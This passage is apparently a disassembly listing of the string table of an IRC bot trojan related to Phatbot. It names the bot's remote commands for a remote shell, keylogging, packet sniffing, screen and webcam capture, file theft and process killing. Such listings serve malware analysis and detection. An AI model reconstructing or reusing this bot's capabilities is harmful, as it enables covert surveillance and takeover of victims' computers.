aRegister db 'register',0 ; DATA XREF: sub_401CC7+3C98�o
align 4
; char aNickservRegist[]
aNickservRegist db 'nickserv register %s %s',0 ; DATA XREF: sub_401CC7+3CC1�o
; char aOff_0[]
aOff_0 db 'off',0 ; DATA XREF: sub_401CC7+3CDC�o
unk_4427D0 db 2Dh ; - ; DATA XREF: sub_401CC7+3D2A�o
db 3, 34h, 2
db 69h ; i
db 72h, 63h, 66h
db 75h ; u
db 63h, 6Bh, 2
db 3
aDisconnectingC db '- disconnecting clones...',0
align 4
; char aNick_1[]
aNick_1 db 'nick',0 ; DATA XREF: sub_401CC7+3D48�o
align 10h
; char aN[]
aN: ; DATA XREF: sub_401CC7+3D5F�o
unicode 0, <n>,0
; char aNickS_7[]
aNickS_7 db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+7D91�o
align 10h
unk_442810 db 2Dh ; - ; DATA XREF: sub_401CC7+7DA2�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aNickChangedToS db 'Nick changed to: ',27h,'%s',27h,'.',0
align 4
; char aJoin_0[]
aJoin_0 db 'join',0 ; DATA XREF: sub_401CC7+3D76�o
align 4
; char aJ[]
aJ: ; DATA XREF: sub_401CC7+3D8D�o
unicode 0, <j>,0
; char aJoinSS_3[]
aJoinSS_3 db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+7D75�o
align 10h
unk_442850 db 2Dh ; - ; DATA XREF: sub_401CC7+7D86�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aJoinedChanne_0 db 'Joined channel: ',27h,'%s',27h,'.',0
align 4
; char aPart_2[]
aPart_2 db 'part',0 ; DATA XREF: sub_401CC7+3DA4�o
align 4
; char aPt[]
aPt db 'pt',0 ; DATA XREF: sub_401CC7+3DBB�o
align 10h
; char aPartS_2[]
aPartS_2 db 'PART %s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+7D52�o
align 4
unk_44288C db 2Dh ; - ; DATA XREF: sub_401CC7+7D63�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aPartedChannelS db 'Parted channel: ',27h,'%s',27h,'.',0
align 10h
; char aRaw[]
aRaw db 'raw',0 ; DATA XREF: sub_401CC7+3DD2�o
; char aR_2[]
aR_2 db 'r',0 ; DATA XREF: sub_401CC7+3DE9�o
align 4
; char aS_20[]
aS_20 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+7D36�o
align 10h
dword_4428C0 dd 234032Dh, 6E69616Dh, 202D0302h, 20435249h, 3A776152h
; DATA XREF: sub_401CC7+7D47�o
dd 2E732520h, 0
; char aKillthread[]
aKillthread db 'killthread',0 ; DATA XREF: sub_401CC7+3E00�o
align 4
; char aK[]
aK: ; DATA XREF: sub_401CC7+3E17�o
unicode 0, <k>,0
; char aAll[]
aAll db 'all',0 ; DATA XREF: sub_401CC7+7C55�o
unk_4428F0 db 2Dh ; - ; DATA XREF: sub_401CC7+7C6F�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aStoppedDThread db '- Stopped: %d thread(s).',0
align 4
unk_442918 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_409940�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aNoActiveThread db '- No active threads found.',0
unk_442940 db 2Dh ; - ; DATA XREF: sub_401CC7+7CBF�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aKilledThreadS_ db '- Killed thread: %s.',0
align 4
; char asc_442964[]
asc_442964 db '-' ; DATA XREF: sub_401CC7:loc_40998D�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aFailedToKillTh db '- Failed to kill thread: %s.',0
align 10h
; char aC_quit[]
aC_quit db 'c_quit',0 ; DATA XREF: sub_401CC7+3E2E�o
align 4
; char aC_q[]
aC_q db 'c_q',0 ; DATA XREF: sub_401CC7+3E45�o
; char aQuitLater_0[]
aQuitLater_0 db 'QUIT :later',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+7BCA�o
align 4
; char aC_rndnick[]
aC_rndnick db 'c_rndnick',0 ; DATA XREF: sub_401CC7+3E5C�o
align 4
; char aC_rn[]
aC_rn db 'c_rn',0 ; DATA XREF: sub_401CC7+3E73�o
align 10h
; char aNickS_6[]
aNickS_6 db 'NICK %s',0 ; DATA XREF: sub_401CC7+7B8A�o
aS_19 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+7B9F�o
align 10h
; char aPrefix[]
aPrefix db 'prefix',0 ; DATA XREF: sub_401CC7+3E8A�o
align 4
; char aPr[]
aPr db 'pr',0 ; DATA XREF: sub_401CC7+3EA1�o
align 4
unk_4429DC db 2Dh ; - ; DATA XREF: sub_401CC7+7B45�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aPrefixChangedT db 'Prefix changed to: ',27h,'%c',27h,'.',0
align 4
; char aOpen[]
aOpen db 'open',0 ; DATA XREF: sub_401CC7+3EB8�o
align 4
; char aO[]
aO: ; DATA XREF: sub_401CC7+3ECF�o
unicode 0, <o>,0
aOpen_1 db 'open',0 ; DATA XREF: sub_401CC7+7B15�o
align 4
unk_442A18 db 2Dh ; - ; DATA XREF: sub_401CC7+7B26�o
db 3, 34h, 2
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aFileOpenedS db ' File opened: %s',0
align 4
unk_442A38 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_4097F7�o
db 3, 34h, 2
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aCouldnTOpenFil db ' Couldn',27h,'t open file: %s',0
; char aServer_5[]
aServer_5 db 'server',0 ; DATA XREF: sub_401CC7+3EE6�o
align 4
; char aSe[]
aSe db 'se',0 ; DATA XREF: sub_401CC7+3EFD�o
align 4
unk_442A68 db 2Dh ; - ; DATA XREF: sub_401CC7+7B06�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aServerChangedT db 'Server changed to: ',27h,'%s',27h,'.',0
align 10h
; char aDns[]
aDns db 'dns',0 ; DATA XREF: sub_401CC7+3F14�o
; char aDn[]
aDn db 'dn',0 ; DATA XREF: sub_401CC7+3F2B�o
align 4
; char asc_442A98[]
asc_442A98 db '-' ; DATA XREF: sub_401CC7+7AB3�o
db 3, 34h, 2
db 64h ; d
db 6Eh, 73h, 2
db 3
aLookupSS_ db '- Lookup: %s -> %s.',0
align 4
unk_442AB8 db 2Dh ; - ; DATA XREF: sub_401CC7+7AE6�o
db 3, 34h, 2
db 64h ; d
db 6Eh, 73h, 2
db 3
aLookupSS__0 db '- Lookup: %s -> %s.',0
align 4
unk_442AD8 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_4097B4�o
db 3, 34h, 2
db 64h ; d
db 6Eh, 73h, 2
db 3
aCouldnTResol_0 db '- Couldn',27h,'t resolve hostname.',0
align 10h
; char aKillproc[]
aKillproc db 'killproc',0 ; DATA XREF: sub_401CC7+3F42�o
align 4
; char aKp[]
aKp db 'kp',0 ; DATA XREF: sub_401CC7+3F59�o
align 10h
unk_442B10 db 2Dh ; - ; DATA XREF: sub_401CC7+7A75�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessKilledS db ' Process killed: %s',0
unk_442B30 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_409746�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aFailedToTermin db ' Failed to terminate process: %s',0
align 10h
; char aKill[]
aKill db 'kill',0 ; DATA XREF: sub_401CC7+3F70�o
align 4
; char aKi[]
aKi db 'ki',0 ; DATA XREF: sub_401CC7+3F87�o
align 4
unk_442B6C db 2Dh ; - ; DATA XREF: sub_401CC7+7A18�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessKilledI db ' Process killed ID: %s',0
align 10h
; char asc_442B90[]
asc_442B90 db '-' ; DATA XREF: sub_401CC7:loc_4096E6�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aFailedToTerm_0 db ' Failed to terminate process ID: %s',0
; char aDelete[]
aDelete db 'delete',0 ; DATA XREF: sub_401CC7+3F9E�o
align 4
; char aDel[]
aDel db 'del',0 ; DATA XREF: sub_401CC7+3FB5�o
; char asc_442BCC[]
asc_442BCC db '-' ; DATA XREF: sub_401CC7+79D6�o
db 3, 34h, 2
dd 656C6966h, 202D0302h, 656C6544h, 20646574h, 27732527h
dd 2Eh
dword_442BE8 dd 234032Dh, 656C6966h, 2D0302h ; DATA XREF: sub_401CC7:loc_4096B8�o
; char aGet_3[]
aGet_3 db 'get',0 ; DATA XREF: sub_401CC7+3FCC�o
; char aGt[]
aGt db 'gt',0 ; DATA XREF: sub_401CC7+3FE3�o
align 4
; char aS_34[]
aS_34 db '%s',0 ; DATA XREF: sub_401CC7+78F9�o
align 10h
; char asc_442C00[]
asc_442C00 db '-' ; DATA XREF: sub_401CC7+7951�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aSendFileSUserS db '- Send File: %s, User: %s.',0
unk_442C24 db 2Dh ; - ; DATA XREF: sub_401CC7+79C0�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToSta_11 db '- Failed to start transfer thread, error: <%d>.',0
align 10h
; char aList[]
aList db 'list',0 ; DATA XREF: sub_401CC7+3FFA�o
align 4
; char aLi[]
aLi db 'li',0 ; DATA XREF: sub_401CC7+4011�o
align 4
dword_442C6C dd 234032Dh, 656C6966h, 202D0302h, 7473694Ch, 7325203Ah
; DATA XREF: sub_401CC7+78D6�o
dd 0
; char aVisit[]
aVisit db 'visit',0 ; DATA XREF: sub_401CC7+4028�o
align 4
; char aV[]
aV: ; DATA XREF: sub_401CC7+403F�o
unicode 0, <v>,0
; char asc_442C90[]
asc_442C90 db '-' ; DATA XREF: sub_401CC7+783A�o
db 3, 34h, 2
dd 69736976h, 2D030274h, 4C525520h, 7325203Ah, 2Eh
; char asc_442CA8[]
asc_442CA8 db '-' ; DATA XREF: sub_401CC7+78A9�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aFailedToSta_12 db ' Failed to start connection thread, error: <%d>.',0
align 4
; char aMirccmd[]
aMirccmd db 'mirccmd',0 ; DATA XREF: sub_401CC7+4056�o
; char aMirc[]
aMirc db 'mirc',0 ; DATA XREF: sub_401CC7+406D�o
align 4
unk_442CF8 db 2Dh ; - ; DATA XREF: sub_401CC7+77C4�o
db 3, 34h, 2
db 6Dh ; m
db 69h, 72h, 63h
db 2
db 3, 2Dh, 20h
aClientNotOpen_ db 'Client not open.',0
align 4
dword_442D18 dd 234032Dh, 6372696Dh, 202D0302h, 6D6D6F43h, 20646E61h
; DATA XREF: sub_401CC7:loc_409492�o
dd 746E6573h, 2Eh
; char aCmd[]
aCmd db 'cmd',0 ; DATA XREF: sub_401CC7+4084�o
; char aCm[]
aCm db 'cm',0 ; DATA XREF: sub_401CC7+409B�o
align 4
; char asc_442D3C[]
asc_442D3C db 0Ah,0 ; DATA XREF: sub_401CC7+7753�o
align 10h
; char asc_442D40[]
asc_442D40 db '-' ; DATA XREF: sub_401CC7+776B�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aErrorSendingTo db '- Error sending to remote shell.',0
align 4
; char asc_442D6C[]
asc_442D6C db '-' ; DATA XREF: sub_401CC7+778A�o
db 3, 34h, 2
dd 2646D63h, 43202D03h, 616D6D6Fh, 3A73646Eh, 732520h
; char aReadfile[]
aReadfile db 'readfile',0 ; DATA XREF: sub_401CC7+40B2�o
align 10h
; char aRf[]
aRf db 'rf',0 ; DATA XREF: sub_401CC7+40C9�o
align 4
; char aR_0[]
aR_0: ; DATA XREF: sub_401CC7:loc_409385�o
unicode 0, <r>,0
unk_442D98 db 2Dh ; - ; DATA XREF: sub_401CC7+7720�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aReadFileComple db 'Read file complete: %s',0
align 4
unk_442DBC db 2Dh ; - ; DATA XREF: sub_401CC7+772B�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aReadFileFailed db 'Read file failed: %s',0
align 10h
; char aPsniff[]
aPsniff db 'psniff',0 ; DATA XREF: sub_401CC7+40E0�o
align 4
; char aOn[]
aOn db 'on',0 ; DATA XREF: sub_401CC7+40F5�o
align 4
dword_442DEC dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401CC7+4115�o
aAlreadyRunni_1 db '- Already running.',0
align 4
; char asc_442E0C[]
asc_442E0C db '-' ; DATA XREF: sub_401CC7+417C�o
db 3, 34h, 2
dd 696E7370h, 3026666h
aCarnivorePacke db '- Carnivore packet sniffer active.',0
align 4
dword_442E3C dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401CC7+41EB�o
aFailedToSta_13 db '- Failed to start sniffer thread, error: <%d>.',0
align 4
; char aOff[]
aOff db 'off',0 ; DATA XREF: sub_401CC7+41F6�o
dword_442E7C dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401CC7+4219�o
aCarnivoreStopp db '- Carnivore stopped. (%d thread(s) stopped.)',0
align 4
dword_442EB8 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401CC7:loc_405EEA�o
aNoCarnivoreThr db '- No Carnivore thread found.',0
align 4
; char aSniffer[]
aSniffer db 'sniffer',0 ; DATA XREF: sub_401CC7+4230�o
; char aOn_0[]
aOn_0 db 'on',0 ; DATA XREF: sub_401CC7+4245�o
align 10h
unk_442EF0 db 2Dh ; - ; DATA XREF: sub_401CC7+4265�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aAlreadyRunni_2 db '- Already running.',0
; char asc_442F10[]
asc_442F10 db '-' ; DATA XREF: sub_401CC7+42CC�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aPhatbotPacketS db '- Phatbot packet sniffer active.',0
align 10h
unk_442F40 db 2Dh ; - ; DATA XREF: sub_401CC7+433B�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aFailedToSta_14 db '- Failed to start sniffer thread, error: <%d>.',0
; char aOff_1[]
aOff_1 db 'off',0 ; DATA XREF: sub_401CC7+4346�o
unk_442F80 db 2Dh ; - ; DATA XREF: sub_401CC7+4369�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aPhatbotSniffer db '- Phatbot sniffer stopped. (%d thread(s) stopped.)',0
unk_442FC0 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_40603A�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aNoPhatbotSniff db '- No Phatbot sniffer thread found.',0
; char aIdent[]
aIdent db 'ident',0 ; DATA XREF: sub_401CC7+4380�o
align 4
; char aOn_1[]
aOn_1 db 'on',0 ; DATA XREF: sub_401CC7+4395�o
align 4
dword_442FFC dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401CC7+43B1�o
aAlreadyRunni_3 db '- Already running.',0
align 4
; char asc_44301C[]
asc_44301C db '-' ; DATA XREF: sub_401CC7+43C1�o
db 3, 34h, 2
dd 6E656469h, 3026474h
aServerRunnin_0 db '- Server running on Port: 113.',0
align 4
dword_443048 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401CC7+440E�o
aFailedToSta_15 db '- Failed to start server, error: <%d>.',0
align 4
; char aOff_2[]
aOff_2 db 'off',0 ; DATA XREF: sub_401CC7+4419�o
dword_443080 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401CC7+443C�o
aServerStopped_ db '- Server stopped. (%d thread(s) stopped.)',0
align 4
dword_4430B8 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401CC7:loc_40610D�o
aNoThreadFound_ db '- No thread found.',0
align 4
; char aKeylog[]
aKeylog db 'keylog',0 ; DATA XREF: sub_401CC7+4453�o
align 10h
; char aOn_2[]
aOn_2 db 'on',0 ; DATA XREF: sub_401CC7+4468�o
align 4
; char aFile[]
aFile db 'file',0 ; DATA XREF: sub_401CC7+4479�o
align 4
dword_4430EC dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_401CC7+44CD�o
aAlreadyRunni_4 db '- Already running.',0
align 4
; char aFile_0[]
aFile_0 db 'file',0 ; DATA XREF: sub_401CC7+44E4�o
align 4
; char asc_443114[]
asc_443114 db '-' ; DATA XREF: sub_401CC7+4551�o
db 3, 34h, 2
dd 6C79656Bh, 302676Fh
aKeyLoggerActiv db '- Key logger active.',0
align 4
dword_443138 dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_401CC7+45C0�o
aFailedToSta_16 db '- Failed to start logging thread, error: <%d>.',0
align 4
; char aOff_3[]
aOff_3 db 'off',0 ; DATA XREF: sub_401CC7+448A�o
dword_443178 dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_401CC7+44AD�o
aKeyLoggerStopp db '- Key logger stopped. (%d thread(s) stopped.)',0
align 4
dword_4431B4 dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_401CC7:loc_40617E�o
aNoKeyLoggerThr db '- No key logger thread found.',0
align 10h
; char aNet[]
aNet db 'net',0 ; DATA XREF: sub_401CC7+45CD�o
; char aStart[]
aStart db 'start',0 ; DATA XREF: sub_401CC7+4624�o
align 4
aS_3 db '%s',0 ; DATA XREF: sub_401CC7+4646�o
align 10h
unk_4431F0 db 2Dh ; - ; DATA XREF: sub_401CC7+4668�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aServiceListCom db '- Service list completed.',0
align 4
unk_443214 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_406339�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aServiceListFai db '- Service list failed.',0
; char aStop[]
aStop db 'stop',0 ; DATA XREF: sub_401CC7+467D�o
align 4
aS_4 db '%s',0 ; DATA XREF: sub_401CC7+469A�o
align 10h
; char aPause[]
aPause db 'pause',0 ; DATA XREF: sub_401CC7+46A5�o
align 4
aS_5 db '%s',0 ; DATA XREF: sub_401CC7+46C2�o
align 4
; char aContinue[]
aContinue db 'continue',0 ; DATA XREF: sub_401CC7+46CD�o
align 4
aS_6 db '%s',0 ; DATA XREF: sub_401CC7+46EA�o
align 4
; char aDelete_0[]
aDelete_0 db 'delete',0 ; DATA XREF: sub_401CC7+46F5�o
align 4
aS_7 db '%s',0 ; DATA XREF: sub_401CC7+4712�o
align 4
; char aShare[]
aShare db 'share',0 ; DATA XREF: sub_401CC7+471D�o
align 10h
aS_8 db '%s',0 ; DATA XREF: sub_401CC7+4749�o
align 4
aS_9 db '%s',0 ; DATA XREF: sub_401CC7+4767�o
align 4
unk_443278 db 2Dh ; - ; DATA XREF: sub_401CC7+478A�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aShareListCompl db '- Share list completed.',0
align 4
unk_44329C db 2Dh ; - ; DATA XREF: sub_401CC7:loc_40645B�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aShareListFaile db '- Share list failed.',0
align 4
; char aUser_0[]
aUser_0 db 'user',0 ; DATA XREF: sub_401CC7+479F�o
align 4
aS_10 db '%s',0 ; DATA XREF: sub_401CC7+47DB�o
align 4
aS_11 db '%s',0 ; DATA XREF: sub_401CC7+4808�o
align 4
aS_12 db '%s',0 ; DATA XREF: sub_401CC7+481F�o
align 10h
unk_4432D0 db 2Dh ; - ; DATA XREF: sub_401CC7+4842�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserListComple db '- User list completed.',0
unk_4432F0 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_406513�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserListFailed db '- User list failed.',0
align 10h
; char aSend_0[]
aSend_0 db 'send',0 ; DATA XREF: sub_401CC7+4857�o
align 4
aS_13 db '%s',0 ; DATA XREF: sub_401CC7+4884�o
align 4
unk_44331C db 2Dh ; - ; DATA XREF: sub_401CC7:loc_406555�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aNoMessageSpeci db '- No message specified.',0
align 10h
unk_443340 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_40655F�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aCommandUnknown db '- Command unknown.',0
unk_44335C db 2Dh ; - ; DATA XREF: sub_401CC7+45F1�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aFailedToLoadAd db '- Failed to load advapi32.dll or netapi32.dll.',0
; char aCapture[]
aCapture db 'capture',0 ; DATA XREF: sub_401CC7+48A5�o
; char aCap[]
aCap db 'cap',0 ; DATA XREF: sub_401CC7+48BC�o
; char aScreen[]
aScreen db 'screen',0 ; DATA XREF: sub_401CC7:loc_40914B�o
align 4
; char asc_4433A8[]
asc_4433A8 db '-' ; DATA XREF: sub_401CC7+74BD�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aScreenCaptureS db '- Screen capture saved to: %s.',0
unk_4433D4 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_409194�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aErrorWhileCapt db '- Error while capturing screen.',0
align 4
; char asc_443404[]
asc_443404 db '-' ; DATA XREF: sub_401CC7:loc_40919B�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aNoFilenameSpec db '- No filename specified for screen capture.',0
align 10h
; char aDrivers[]
aDrivers db 'drivers',0 ; DATA XREF: sub_401CC7:loc_4091AE�o
; char asc_443448[]
asc_443448 db '-' ; DATA XREF: sub_401CC7+753B�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aDriverDSS_ db '- Driver #%d - %s - %s.',0
align 10h
; char asc_443470[]
asc_443470 db '-' ; DATA XREF: sub_401CC7+7571�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aDriverListComp db '- Driver list complete.',0
align 4
; char aFrame[]
aFrame db 'frame',0 ; DATA XREF: sub_401CC7:loc_409245�o
align 10h
; char asc_4434A0[]
asc_4434A0 db '-' ; DATA XREF: sub_401CC7+75F4�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aWebcamCaptureS db '- Webcam capture saved to: %s.',0
unk_4434CC db 2Dh ; - ; DATA XREF: sub_401CC7:loc_4092CB�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aErrorWhileCa_0 db '- Error while capturing from webcam.',0
align 10h
; char asc_443500[]
asc_443500 db '-' ; DATA XREF: sub_401CC7:loc_4092D2�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aInvalidParam_0 db '- Invalid parameters for webcam capture.',0
align 4
; char aVideo[]
aVideo db 'video',0 ; DATA XREF: sub_401CC7:loc_4092E5�o
align 10h
unk_443540 db 2Dh ; - ; DATA XREF: sub_401CC7+76A0�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aAmateurVideoSa db '- Amateur video saved to: %s.',0
align 4
unk_44356C db 2Dh ; - ; DATA XREF: sub_401CC7:loc_409371�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aErrorWhileCa_1 db '- Error while capturing amateur video from webcam.',0
unk_4435AC db 2Dh ; - ; DATA XREF: sub_401CC7:loc_40937B�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aInvalidParam_1 db '- Invalid parameters for amateur video capture.',0
align 4
; char aGethost[]
aGethost db 'gethost',0 ; DATA XREF: sub_401CC7+48D3�o
; char aGh[]
aGh db 'gh',0 ; DATA XREF: sub_401CC7+48EA�o
align 4
; char aSSSS_1[]
aSSSS_1 db '%s %s %s :%s',0 ; DATA XREF: sub_401CC7+73E2�o
align 4
; char asc_443608[]
asc_443608 db '-' ; DATA XREF: sub_401CC7+740C�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aGethostSComman db 'Gethost: %s, Command: %s',0
align 10h
; char asc_443630[]
asc_443630 db '-' ; DATA XREF: sub_401CC7+7428�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUnableToExtrac db 'Unable to extract Gethost command.',0
align 10h
; char asc_443660[]
asc_443660 db '-' ; DATA XREF: sub_401CC7+746C�o
db 3, 34h, 2
dd 6E69616Dh, 202D0302h, 68746547h, 3A74736Fh, 2E732520h
dd 0
; char aKilllog[]
aKilllog db 'killlog',0 ; DATA XREF: sub_401CC7+4913�o
; char aKl[]
aKl db 'kl',0 ; DATA XREF: sub_401CC7+492A�o
align 4
; char aAddalias[]
aAddalias db 'addalias',0 ; DATA XREF: sub_401CC7+4941�o
align 4
; char aAa[]
aAa db 'aa',0 ; DATA XREF: sub_401CC7+4958�o
align 4
unk_443698 db 2Dh ; - ; DATA XREF: sub_401CC7+736F�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aAliasAddedS_ db 'Alias added: %s.',0
align 4
; char aPrivmsg_1[]
aPrivmsg_1 db 'privmsg',0 ; DATA XREF: sub_401CC7+496F�o
; char aPm[]
aPm db 'pm',0 ; DATA XREF: sub_401CC7+4986�o
align 4
unk_4436C4 db 2Dh ; - ; DATA XREF: sub_401CC7+733D�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aPrivmsgSS_ db 'Privmsg: %s: %s.',0
align 4
; char aAction[]
aAction db 'action',0 ; DATA XREF: sub_401CC7+499D�o
align 4
; char aA[]
aA: ; DATA XREF: sub_401CC7+49B4�o
unicode 0, <a>,0
; char dword_4436F0
dword_4436F0 dd 54434101h, 204E4F49h, 17325h ; DATA XREF: sub_401CC7+72CA�o
unk_4436FC db 2Dh ; - ; DATA XREF: sub_401CC7+72EC�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aActionSS_ db 'Action: %s: %s.',0
; char aCycle[]
aCycle db 'cycle',0 ; DATA XREF: sub_401CC7+49CB�o
align 10h
; char aCy[]
aCy db 'cy',0 ; DATA XREF: sub_401CC7+49E2�o
align 4
; char a332_2[]
a332_2 db '332',0 ; DATA XREF: sub_401CC7+722D�o
; char aPartS_1[]
aPartS_1 db 'PART %s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+7244�o
align 4
; char aJoinSS_2[]
aJoinSS_2 db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+7271�o
align 4
dword_443744 dd 234032Dh, 6E69616Dh, 202D0302h, 6C637943h, 2E65h
; DATA XREF: sub_401CC7+727E�o
; char aMode_0[]
aMode_0 db 'mode',0 ; DATA XREF: sub_401CC7+49F9�o
align 10h
; char aM[]
aM: ; DATA XREF: sub_401CC7+4A10�o
unicode 0, <m>,0
; char aModeS_0[]
aModeS_0 db 'MODE %s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+720C�o
align 10h
unk_443770 db 2Dh ; - ; DATA XREF: sub_401CC7+721D�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aModeChangeS db 'Mode change: %s',0
; char aC_raw[]
aC_raw db 'c_raw',0 ; DATA XREF: sub_401CC7+4A27�o
align 4
; char aC_r[]
aC_r db 'c_r',0 ; DATA XREF: sub_401CC7+4A3E�o
; char aS_18[]
aS_18 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+71C1�o
align 10h
dword_4437A0 dd 234032Dh, 6E6F6C63h, 2D030265h, 77615220h, 73252820h
; DATA XREF: sub_401CC7+71E3�o
dd 25203A29h, 73h
; char aC_mode[]
aC_mode db 'c_mode',0 ; DATA XREF: sub_401CC7+4A55�o
align 4
; char aC_m[]
aC_m db 'c_m',0 ; DATA XREF: sub_401CC7+4A6C�o
; char aModeS[]
aModeS db 'MODE %s',0 ; DATA XREF: sub_401CC7+711D�o
; char aS_17[]
aS_17 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+7153�o
align 4
